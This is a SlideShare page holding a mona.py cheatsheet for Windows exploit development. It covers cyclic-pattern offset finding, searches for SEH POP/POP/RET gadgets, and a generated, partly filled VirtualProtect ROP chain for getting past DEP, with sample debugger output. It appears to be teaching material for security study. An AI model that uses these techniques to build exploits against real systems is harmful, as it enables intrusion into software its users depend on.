SlideShare a Scribd company logo
1 of 5
Download to read offline
===========================
A LITTLE MONA.PY CHEATSHEET
===========================

Last Modify: 08/12/2011
Author: luca.mella@studio.unibo.it


************************************************************************
*** Configuration ******************************************************
************************************************************************

!mona config -set workingfolder c:logs%p
      Set the current working directory. Mona will put output here.
      You might use -get alse for retrive current working folder.
      (%p means processname)

-cm <option>=true/false
      safeseh
      aslr
      os
      rebase

************************************************************************
*** General searching options ******************************************
************************************************************************

-cp <option>,<option>
      nonull
      unicode                  00xx00yy
      ascii
      asciiprint
      upper
      lower
      uppernum
      lowernum
      numeric
      alphanum
      startswithnull      00xxyyzz

-cpb <badchars>
      Exclude specified badchars from pointer search

-p <N>
      Number of pointers to return

-x <level>
      R,W,X,RW,RX,WX,RWX,*     pointers that point to a segment with specified
access level

************************************************************************
*** Pattern ************************************************************
************************************************************************

!mona pc <size>
      Create a cyclic pattern of <size> bytes. Same of "msf_pattern" in metasploit

!mona po <0x4bytes>
      find the offset of specified bytes in cyclic pattern
************************************************************************
*** After a crash with cyclic pattern payload **************************
************************************************************************

!mona suggest

     Watch for output..
     EIP overwritten with normal pattern :   0x37694136 (offset 260)
     !!! %EBP+4
     ESP (0x0018f574) points at offset 264   in normal pattern (length 736)
     EBP overwritten with normal pattern :   0x69413569 (offset 256)
     EBX (0x0018f580) points at offset 276   in normal pattern (length 724)

      --- output ---
      0BADF00D   [+] Processing arguments and criteria
      0BADF00D       - Pointer access level : X
      0BADF00D   [+] Looking for cyclic pattern in memory
      750F0000   Modules C:WindowsSystem32wshtcpip.dll
      0BADF00D       Cyclic pattern (normal) found at 0x0018f46c (length 1000
bytes)
      0BADF00D       Cyclic pattern (normal) found at 0x001c3961 (length 1000
bytes)
      0BADF00D   [+] Examining registers
      0BADF00D       EIP overwritten with normal pattern : 0x37694136 (offset 260)
      0BADF00D       ESP (0x0018f574) points at offset 264 in normal pattern
(length 736)
      0BADF00D       EBP overwritten with normal pattern : 0x69413569 (offset 256)
      0BADF00D       EBX (0x0018f580) points at offset 276 in normal pattern
(length 724)
      0BADF00D   [+] Examining SEH chain
      0BADF00D   [+] Examining stack
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x1e8 (-488) :
0x0018f580 : offset 276, length 724
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x19c (-412) :
0x001c396d : offset 12, length 988
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x174 (-372) :
0x0018f46c : offset 0, length 1000
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x170 (-368) :
0x001c396d : offset 12, length 988
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x164 (-356) :
0x0018f580 : offset 276, length 724
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x154 (-340) :
0x0018f56c : offset 256, length 744
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x134 (-308) :
0x0018f580 : offset 276, length 724
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x114 (-276) :
0x0018f46c : offset 0, length 1000
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x110 (-272) :
0x0018f46c : offset 0, length 1000
      0BADF00D       Pointer into normal cyclic pattern at ESP-0x10c (-268) :
0x0018f580 : offset 276, length 724
      0BADF00D   [+] Preparing log file 'exploit.rb'
      0BADF00D       - (Re)setting logfile C:mona_logsexploit.rb
      0BADF00D   [+] Generating module info table, hang on...
      0BADF00D       - Processing modules
      0BADF00D       - Done. Let's rock 'n roll.
      --- end of output ---
************************************************************************
*** Finding things in memory *******************************************
************************************************************************

!mona find

      Find a sequence of bytes in memory.
      Mandatory argument : -s <pattern> : the sequence to search for.
      -type <type>    : Type of pattern to search for : bin,asc,ptr,instr,file
      -b <address> : the bottom of the search range
      -t <address> : the top of the search range
      -c : skip consecutive pointers but show length of the pattern instead
      -p2p : show pointers to pointers to the pattern (might take a while !)
      -r <number> : if p2p is used, you can tell the find to also find close
pointers by specifying -r with a value.
                          This value indicates the number of bytes to step
backwards for each search

!mona find -type instr -s "jmp ebx" -m ntdll.dll

      --- output ---
      Search into module ntdll.dll
      Search for "jmp ebx" as assembly instruction
      Result:
      0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll]
ASLR: True, Rebase: True,
                                                SafeSEH: True, OS: True,
v6.1.7600.16385 (C:WindowsSysWOW64ntdll.dll)
      --- end of output ---

************************************************************************
*** Assemble instructions **********************************************
************************************************************************

!mona assemble -s "nop"

     Return the opcode of specified instructions (chain with '#').

************************************************************************
*** Searching for 'POP/POP/RET' instruction (SEH exploiting) ***********
************************************************************************
!mona seh

     Find POP POP RET instruction into program memory.
     This statements could be used in SEH exploiting.

     --- output ---
     0BADF00D   [+] Writing results to C:mona_logsseh.txt
     0BADF00D       - Number of pointers of type 'pop ebx #   pop   eax # ret ' : 3
     0BADF00D       - Number of pointers of type 'pop esi #   pop   edi # ret ' : 3
     0BADF00D       - Number of pointers of type 'pop ecx #   pop   ebx # ret ' : 1
     0BADF00D       - Number of pointers of type 'pop ebx #   pop   ebp # ret ' : 3
     0BADF00D       - Number of pointers of type 'pop ebx #   pop   eax # ret 04' : 2
     0BADF00D       - Number of pointers of type 'pop ebx #   pop   ecx # ret ' : 15
     0BADF00D       - Number of pointers of type 'pop ecx #   pop   edi # ret ' : 1
     0BADF00D       - Number of pointers of type 'pop ebx #   pop   ecx # ret 0c' : 1
     0BADF00D       - Number of pointers of type 'pop esi #   pop   ebx # ret ' : 6
     0BADF00D       - Number of pointers of type 'jmp dword   ptr   ss:[esp+14]' : 1
     0BADF00D       - Number of pointers of type 'pop esi #   pop   ebx # ret 08' : 2
0BADF00D       - Number    of   pointers   of   type   'call dword ptr ss:[ebp-04]'   :   1
     0BADF00D       - Number    of   pointers   of   type   'pop esi # pop ebx # ret 04'   :   2
     0BADF00D       - Number    of   pointers   of   type   'call dword ptr ss:[esp+14]'   :   1
     0BADF00D       - Number    of   pointers   of   type   'pop ebx # pop ecx # ret 04'   :   14
     0BADF00D       - Number    of   pointers   of   type   'call dword ptr ss:[ebp-18]'   :   1
     0BADF00D       - Number    of   pointers   of   type   'pop edi # pop ebx # ret ' :   1
     [..]
     --- end of output ---

************************************************************************
*** ROP based exploit *******************************
************************************************************************

!mona rop -m <NONASLRMODULES>

      Analyze memory prepare several lists of ROP valid gadget (any INSTR + RET
sequence), stack pivots, rop functions,
      Generate a ROP chain aimed to bypass DEP (call to VirtualProtect with PUSHAD
technique), and suggest wich address
      need to be fixed for make it works.

     NOTE:
            Watch "C:mona_logsrop_suggestion.txt" for a clear gadget list.
            Watch "C:mona_logsrop_virtualprotect.txt" for a starting point for
your rop payload (aimed to DEP bypass).
            Watch "C:mona_logsstack_pivot.txt" for a list of gadget that permit
to change ESP.

      --- output ---
           ---------- Mona command started on 2011-07-21 10:58:09 ----------
               [..]
                         VirtualProtect register structure (PUSHAD technique)
                         ----------------------------------------------------
                           EAX = NOP (0x90909090)
                           ECX = lpOldProtect (Writable ptr)
                           EDX = NewProtect (0x40)
                           EBX = Size
                           ESP = lPAddress (automatic)
                           EBP = ReturnTo (ptr to jmp esp - run '!mona jmp -r esp -
n -o')
                           ESI = ptr to VirtualProtect()
                           EDI = ROP NOP (RETN)

                         VirtualProtect() 'pushad' rop chain
                         ------------------------------------
                           rop_gadgets =
                                 [
                                       0x00404880,    # POP ECX # RETN (server.exe)
                                       0x????????,    # <- *&VirtualProtect()
                                       0x00406a48,    # MOV EAX,DWORD PTR DS:[ECX]
# ADD EAX,ECX # RETN (server.exe)
                                       0x????????,    # ** <- find routine to move
virtualprotect() into esi
                                                              # ** Hint : look for
mov [esp+offset],eax and pop esi
                                       0x????????,    # couldn't find a pointer to
put ptr to 'jmp esp' into ebp
                                       0x????????,    # <- put pointer to payload
here
0x00403e04,    # POP EBX # RETN (server.exe)
                                      0x00000201,    # <- change size to mark as
executable if needed (-> ebx)
                                      0x00404880,    # POP ECX # RETN (server.exe)
                                      0x00409000,    # RW pointer (lpOldProtect)
(-> ecx)
                                      0x00404be4,    # POP EDI # RETN (server.exe)
                                      0x00404be5,    # ROP NOP (-> edi)
                                      0x0040431c,    # POP EDX # RETN (server.exe)
                                      0x00000040,    # newProtect (0x40) (-> edx)
                                      0x00404a84,    # POP EAX # RETN (server.exe)
                                      0x90909090,    # NOPS (-> eax)
                                      0x004022e0,    # PUSHAD # RETN (server.exe)
                                # rop chain generated by mona.py
                                # note : this chain may not work out of the box
                                # you may have to change order or fix some
gadgets,
                                # but it should give you a head start
                                ].pack("V*")
           [..]
     --- end of output ---


===================================================================================
===
Reference:
      https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
      https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-
breakfast/

More Related Content

What's hot (20)

Database Connectivity in PHP
Database Connectivity in PHPDatabase Connectivity in PHP
Database Connectivity in PHP
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 
Css lecture notes
Css lecture notesCss lecture notes
Css lecture notes
 
Introduction to html 5
Introduction to html 5Introduction to html 5
Introduction to html 5
 
Module 3 - Intro to Bootstrap
Module 3 - Intro to BootstrapModule 3 - Intro to Bootstrap
Module 3 - Intro to Bootstrap
 
An introduction to bootstrap
An introduction to bootstrapAn introduction to bootstrap
An introduction to bootstrap
 
The PostgreSQL Query Planner
The PostgreSQL Query PlannerThe PostgreSQL Query Planner
The PostgreSQL Query Planner
 
HTML
HTMLHTML
HTML
 
Html introduction
Html introductionHtml introduction
Html introduction
 
PHP POWERPOINT SLIDES
PHP POWERPOINT SLIDESPHP POWERPOINT SLIDES
PHP POWERPOINT SLIDES
 
Java script
Java scriptJava script
Java script
 
Web Development with Python and Django
Web Development with Python and DjangoWeb Development with Python and Django
Web Development with Python and Django
 
Html training slide
Html training slideHtml training slide
Html training slide
 
Bootstrap 5 basic
Bootstrap 5 basicBootstrap 5 basic
Bootstrap 5 basic
 
jQuery
jQueryjQuery
jQuery
 
Dom(document object model)
Dom(document object model)Dom(document object model)
Dom(document object model)
 
Query Optimization with MySQL 5.6: Old and New Tricks - Percona Live London 2013
Query Optimization with MySQL 5.6: Old and New Tricks - Percona Live London 2013Query Optimization with MySQL 5.6: Old and New Tricks - Percona Live London 2013
Query Optimization with MySQL 5.6: Old and New Tricks - Percona Live London 2013
 
HTML Forms
HTML FormsHTML Forms
HTML Forms
 
Images and Lists in HTML
Images and Lists in HTMLImages and Lists in HTML
Images and Lists in HTML
 
InnoDB Performance Optimisation
InnoDB Performance OptimisationInnoDB Performance Optimisation
InnoDB Performance Optimisation
 

Viewers also liked

Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...Ajin Abraham
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentAjin Abraham
 
Computational investigation of blast survivability and off-road performance o...
Computational investigation of blast survivability and off-road performance o...Computational investigation of blast survivability and off-road performance o...
Computational investigation of blast survivability and off-road performance o...Hemanth Nallagatla
 
Lecture2 - Image classification and the data-driven approach k-nearest neigh...
Lecture2 - Image classification and the data-driven approach  k-nearest neigh...Lecture2 - Image classification and the data-driven approach  k-nearest neigh...
Lecture2 - Image classification and the data-driven approach k-nearest neigh...Inyoung Oh
 
Blast Study Method
Blast Study MethodBlast Study Method
Blast Study MethodCC Undertree
 
Muhammad abdullah blast inj.
Muhammad abdullah blast inj.Muhammad abdullah blast inj.
Muhammad abdullah blast inj.Mahar852
 
Religious and daily life
Religious  and daily lifeReligious  and daily life
Religious and daily lifeMrsSevCTK
 
Penetrating bain injuries
Penetrating bain injuriesPenetrating bain injuries
Penetrating bain injuriesMukhtar Khan
 
Building your credibility with LinkedIn
Building your credibility with LinkedInBuilding your credibility with LinkedIn
Building your credibility with LinkedInTariq Ahmad
 
Edexcel GCSE Religious Studies J2 Revision
Edexcel GCSE Religious Studies J2 RevisionEdexcel GCSE Religious Studies J2 Revision
Edexcel GCSE Religious Studies J2 RevisionSusan Kambalu
 
Research on Effective Study Habbits
Research on Effective Study HabbitsResearch on Effective Study Habbits
Research on Effective Study HabbitsValerie Landau
 
21.Mendoza, Daizelle Ann M.
21.Mendoza, Daizelle Ann M.21.Mendoza, Daizelle Ann M.
21.Mendoza, Daizelle Ann M.zelle203
 

Viewers also liked (20)

Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
five kinds of deadly sins
five kinds of deadly sinsfive kinds of deadly sins
five kinds of deadly sins
 
Video in learning process
Video in learning processVideo in learning process
Video in learning process
 
Computational investigation of blast survivability and off-road performance o...
Computational investigation of blast survivability and off-road performance o...Computational investigation of blast survivability and off-road performance o...
Computational investigation of blast survivability and off-road performance o...
 
Arboleda autos
Arboleda autosArboleda autos
Arboleda autos
 
Revival Stories
Revival Stories Revival Stories
Revival Stories
 
Lecture2 - Image classification and the data-driven approach k-nearest neigh...
Lecture2 - Image classification and the data-driven approach  k-nearest neigh...Lecture2 - Image classification and the data-driven approach  k-nearest neigh...
Lecture2 - Image classification and the data-driven approach k-nearest neigh...
 
Blast Study Method
Blast Study MethodBlast Study Method
Blast Study Method
 
Muhammad abdullah blast inj.
Muhammad abdullah blast inj.Muhammad abdullah blast inj.
Muhammad abdullah blast inj.
 
SALMAN CV New
SALMAN CV NewSALMAN CV New
SALMAN CV New
 
Post blast scene
Post blast scenePost blast scene
Post blast scene
 
Religious and daily life
Religious  and daily lifeReligious  and daily life
Religious and daily life
 
TK Slowakei
TK SlowakeiTK Slowakei
TK Slowakei
 
Penetrating bain injuries
Penetrating bain injuriesPenetrating bain injuries
Penetrating bain injuries
 
Building your credibility with LinkedIn
Building your credibility with LinkedInBuilding your credibility with LinkedIn
Building your credibility with LinkedIn
 
Edexcel GCSE Religious Studies J2 Revision
Edexcel GCSE Religious Studies J2 RevisionEdexcel GCSE Religious Studies J2 Revision
Edexcel GCSE Religious Studies J2 Revision
 
Research on Effective Study Habbits
Research on Effective Study HabbitsResearch on Effective Study Habbits
Research on Effective Study Habbits
 
21.Mendoza, Daizelle Ann M.
21.Mendoza, Daizelle Ann M.21.Mendoza, Daizelle Ann M.
21.Mendoza, Daizelle Ann M.
 

Similar to Mona cheatsheet

Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Kernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesKernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesAnne Nicolas
 
Exploiting Memory Overflows
Exploiting Memory OverflowsExploiting Memory Overflows
Exploiting Memory OverflowsAnkur Tyagi
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64FFRI, Inc.
 
Reverse Engineering Dojo: Enhancing Assembly Reading Skills
Reverse Engineering Dojo: Enhancing Assembly Reading SkillsReverse Engineering Dojo: Enhancing Assembly Reading Skills
Reverse Engineering Dojo: Enhancing Assembly Reading SkillsAsuka Nakajima
 
Load-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOADLoad-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOADDharmalingam Ganesan
 
Windows debugging sisimon
Windows debugging   sisimonWindows debugging   sisimon
Windows debugging sisimonSisimon Soman
 
The forgotten art of assembly
The forgotten art of assemblyThe forgotten art of assembly
The forgotten art of assemblyMarian Marinov
 
How the stack works(1)
How the stack works(1)How the stack works(1)
How the stack works(1)keithrozario
 
Getting Started with Raspberry Pi - DCC 2013.1
Getting Started with Raspberry Pi - DCC 2013.1Getting Started with Raspberry Pi - DCC 2013.1
Getting Started with Raspberry Pi - DCC 2013.1Tom Paulus
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_royRoy
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughterQuinn Wilton
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyPriyanka Aash
 
Symbolic Debugging with DWARF
Symbolic Debugging with DWARFSymbolic Debugging with DWARF
Symbolic Debugging with DWARFSamy Bahra
 
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이GangSeok Lee
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainSaumil Shah
 
What will be quantization step size in numbers and in voltage for th.pdf
What will be quantization step size in numbers and in voltage for th.pdfWhat will be quantization step size in numbers and in voltage for th.pdf
What will be quantization step size in numbers and in voltage for th.pdfSIGMATAX1
 
5asm the stackandsubroutines
5asm the stackandsubroutines5asm the stackandsubroutines
5asm the stackandsubroutinesRabi Iftikhar
 
Lab2.txt# CMPEN 331, Lab 2# - - - - - - - - - - - - - - - - - - .docx
Lab2.txt# CMPEN 331, Lab 2# - - - - - - - - - - - - - - - - - - .docxLab2.txt# CMPEN 331, Lab 2# - - - - - - - - - - - - - - - - - - .docx
Lab2.txt# CMPEN 331, Lab 2# - - - - - - - - - - - - - - - - - - .docxsmile790243
 

Similar to Mona cheatsheet (20)

Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Kernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering OopsiesKernel Recipes 2013 - Deciphering Oopsies
Kernel Recipes 2013 - Deciphering Oopsies
 
Exploiting Memory Overflows
Exploiting Memory OverflowsExploiting Memory Overflows
Exploiting Memory Overflows
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64
 
Reverse Engineering Dojo: Enhancing Assembly Reading Skills
Reverse Engineering Dojo: Enhancing Assembly Reading SkillsReverse Engineering Dojo: Enhancing Assembly Reading Skills
Reverse Engineering Dojo: Enhancing Assembly Reading Skills
 
Load-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOADLoad-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOAD
 
Windows debugging sisimon
Windows debugging   sisimonWindows debugging   sisimon
Windows debugging sisimon
 
The forgotten art of assembly
The forgotten art of assemblyThe forgotten art of assembly
The forgotten art of assembly
 
How the stack works(1)
How the stack works(1)How the stack works(1)
How the stack works(1)
 
Getting Started with Raspberry Pi - DCC 2013.1
Getting Started with Raspberry Pi - DCC 2013.1Getting Started with Raspberry Pi - DCC 2013.1
Getting Started with Raspberry Pi - DCC 2013.1
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
 
Symbolic Debugging with DWARF
Symbolic Debugging with DWARFSymbolic Debugging with DWARF
Symbolic Debugging with DWARF
 
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great Again
 
What will be quantization step size in numbers and in voltage for th.pdf
What will be quantization step size in numbers and in voltage for th.pdfWhat will be quantization step size in numbers and in voltage for th.pdf
What will be quantization step size in numbers and in voltage for th.pdf
 
5asm the stackandsubroutines
5asm the stackandsubroutines5asm the stackandsubroutines
5asm the stackandsubroutines
 
C&cpu
C&cpuC&cpu
C&cpu
 
Lab2.txt# CMPEN 331, Lab 2# - - - - - - - - - - - - - - - - - - .docx
Lab2.txt# CMPEN 331, Lab 2# - - - - - - - - - - - - - - - - - - .docxLab2.txt# CMPEN 331, Lab 2# - - - - - - - - - - - - - - - - - - .docx
Lab2.txt# CMPEN 331, Lab 2# - - - - - - - - - - - - - - - - - - .docx
 

More from Ce.Se.N.A. Security

Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
 Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route... Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...Ce.Se.N.A. Security
 
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...Ce.Se.N.A. Security
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick reviewCe.Se.N.A. Security
 
Msfpayload/Msfencoder cheatsheet
Msfpayload/Msfencoder cheatsheetMsfpayload/Msfencoder cheatsheet
Msfpayload/Msfencoder cheatsheetCe.Se.N.A. Security
 
Analisi sulla sicurezza di una autovettura moderna
Analisi sulla sicurezza di una autovettura modernaAnalisi sulla sicurezza di una autovettura moderna
Analisi sulla sicurezza di una autovettura modernaCe.Se.N.A. Security
 
Monitoraggio di mac address in lan
Monitoraggio di mac address in lanMonitoraggio di mac address in lan
Monitoraggio di mac address in lanCe.Se.N.A. Security
 
Inoltro di pacchetti ip in sistemi linux
Inoltro di pacchetti ip in sistemi linuxInoltro di pacchetti ip in sistemi linux
Inoltro di pacchetti ip in sistemi linuxCe.Se.N.A. Security
 
Crimini informatici e accesso abusivo
Crimini informatici e accesso abusivoCrimini informatici e accesso abusivo
Crimini informatici e accesso abusivoCe.Se.N.A. Security
 

More from Ce.Se.N.A. Security (20)

Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
 Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route... Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
 
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Msfpayload/Msfencoder cheatsheet
Msfpayload/Msfencoder cheatsheetMsfpayload/Msfencoder cheatsheet
Msfpayload/Msfencoder cheatsheet
 
ICTF overview
ICTF overviewICTF overview
ICTF overview
 
Anonymous email
Anonymous emailAnonymous email
Anonymous email
 
Hacking reti wireless
Hacking reti wirelessHacking reti wireless
Hacking reti wireless
 
SELinux - overview
SELinux - overviewSELinux - overview
SELinux - overview
 
Analisi sulla sicurezza di una autovettura moderna
Analisi sulla sicurezza di una autovettura modernaAnalisi sulla sicurezza di una autovettura moderna
Analisi sulla sicurezza di una autovettura moderna
 
Sicurezza delle reti 802.11
Sicurezza delle reti 802.11Sicurezza delle reti 802.11
Sicurezza delle reti 802.11
 
Rilevamento intrusioni in wlan
Rilevamento intrusioni in wlanRilevamento intrusioni in wlan
Rilevamento intrusioni in wlan
 
Rainbow tables
Rainbow tablesRainbow tables
Rainbow tables
 
Network monitoring tramite snmp
Network monitoring tramite snmpNetwork monitoring tramite snmp
Network monitoring tramite snmp
 
Monitoraggio di rete con nagios
Monitoraggio di rete con nagiosMonitoraggio di rete con nagios
Monitoraggio di rete con nagios
 
Monitoraggio di mac address in lan
Monitoraggio di mac address in lanMonitoraggio di mac address in lan
Monitoraggio di mac address in lan
 
Ip sec vulnerability
Ip sec vulnerabilityIp sec vulnerability
Ip sec vulnerability
 
Insider attack
Insider attackInsider attack
Insider attack
 
Inoltro di pacchetti ip in sistemi linux
Inoltro di pacchetti ip in sistemi linuxInoltro di pacchetti ip in sistemi linux
Inoltro di pacchetti ip in sistemi linux
 
Iena
IenaIena
Iena
 
Crimini informatici e accesso abusivo
Crimini informatici e accesso abusivoCrimini informatici e accesso abusivo
Crimini informatici e accesso abusivo
 

Mona cheatsheet

  • 1. =========================== A LITTLE MONA.PY CHEATSHEET =========================== Last Modify: 08/12/2011 Author: luca.mella@studio.unibo.it ************************************************************************ *** Configuration ****************************************************** ************************************************************************ !mona config -set workingfolder c:logs%p Set the current working directory. Mona will put output here. You might use -get alse for retrive current working folder. (%p means processname) -cm <option>=true/false safeseh aslr os rebase ************************************************************************ *** General searching options ****************************************** ************************************************************************ -cp <option>,<option> nonull unicode 00xx00yy ascii asciiprint upper lower uppernum lowernum numeric alphanum startswithnull 00xxyyzz -cpb <badchars> Exclude specified badchars from pointer search -p <N> Number of pointers to return -x <level> R,W,X,RW,RX,WX,RWX,* pointers that point to a segment with specified access level ************************************************************************ *** Pattern ************************************************************ ************************************************************************ !mona pc <size> Create a cyclic pattern of <size> bytes. Same of "msf_pattern" in metasploit !mona po <0x4bytes> find the offset of specified bytes in cyclic pattern
  • 2. ************************************************************************ *** After a crash with cyclic pattern payload ************************** ************************************************************************ !mona suggest Watch for output.. EIP overwritten with normal pattern : 0x37694136 (offset 260) !!! %EBP+4 ESP (0x0018f574) points at offset 264 in normal pattern (length 736) EBP overwritten with normal pattern : 0x69413569 (offset 256) EBX (0x0018f580) points at offset 276 in normal pattern (length 724) --- output --- 0BADF00D [+] Processing arguments and criteria 0BADF00D - Pointer access level : X 0BADF00D [+] Looking for cyclic pattern in memory 750F0000 Modules C:WindowsSystem32wshtcpip.dll 0BADF00D Cyclic pattern (normal) found at 0x0018f46c (length 1000 bytes) 0BADF00D Cyclic pattern (normal) found at 0x001c3961 (length 1000 bytes) 0BADF00D [+] Examining registers 0BADF00D EIP overwritten with normal pattern : 0x37694136 (offset 260) 0BADF00D ESP (0x0018f574) points at offset 264 in normal pattern (length 736) 0BADF00D EBP overwritten with normal pattern : 0x69413569 (offset 256) 0BADF00D EBX (0x0018f580) points at offset 276 in normal pattern (length 724) 0BADF00D [+] Examining SEH chain 0BADF00D [+] Examining stack 0BADF00D Pointer into normal cyclic pattern at ESP-0x1e8 (-488) : 0x0018f580 : offset 276, length 724 0BADF00D Pointer into normal cyclic pattern at ESP-0x19c (-412) : 0x001c396d : offset 12, length 988 0BADF00D Pointer into normal cyclic pattern at ESP-0x174 (-372) : 0x0018f46c : offset 0, length 1000 0BADF00D Pointer into normal cyclic pattern at ESP-0x170 (-368) : 0x001c396d : offset 12, length 988 0BADF00D Pointer into normal cyclic pattern at ESP-0x164 (-356) : 0x0018f580 : offset 276, length 724 0BADF00D Pointer into normal cyclic pattern at ESP-0x154 (-340) : 0x0018f56c : offset 256, length 744 0BADF00D Pointer into normal cyclic pattern at ESP-0x134 (-308) : 0x0018f580 : offset 276, length 724 0BADF00D Pointer into normal cyclic pattern at ESP-0x114 (-276) : 0x0018f46c : offset 0, length 1000 0BADF00D Pointer into normal cyclic pattern at ESP-0x110 (-272) : 0x0018f46c : offset 0, length 1000 0BADF00D Pointer into normal cyclic pattern at ESP-0x10c (-268) : 0x0018f580 : offset 276, length 724 0BADF00D [+] Preparing log file 'exploit.rb' 0BADF00D - (Re)setting logfile C:mona_logsexploit.rb 0BADF00D [+] Generating module info table, hang on... 0BADF00D - Processing modules 0BADF00D - Done. Let's rock 'n roll. --- end of output ---
  • 3. ************************************************************************ *** Finding things in memory ******************************************* ************************************************************************ !mona find Find a sequence of bytes in memory. Mandatory argument : -s <pattern> : the sequence to search for. -type <type> : Type of pattern to search for : bin,asc,ptr,instr,file -b <address> : the bottom of the search range -t <address> : the top of the search range -c : skip consecutive pointers but show length of the pattern instead -p2p : show pointers to pointers to the pattern (might take a while !) -r <number> : if p2p is used, you can tell the find to also find close pointers by specifying -r with a value. This value indicates the number of bytes to step backwards for each search !mona find -type instr -s "jmp ebx" -m ntdll.dll --- output --- Search into module ntdll.dll Search for "jmp ebx" as assembly instruction Result: 0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7600.16385 (C:WindowsSysWOW64ntdll.dll) --- end of output --- ************************************************************************ *** Assemble instructions ********************************************** ************************************************************************ !mona assemble -s 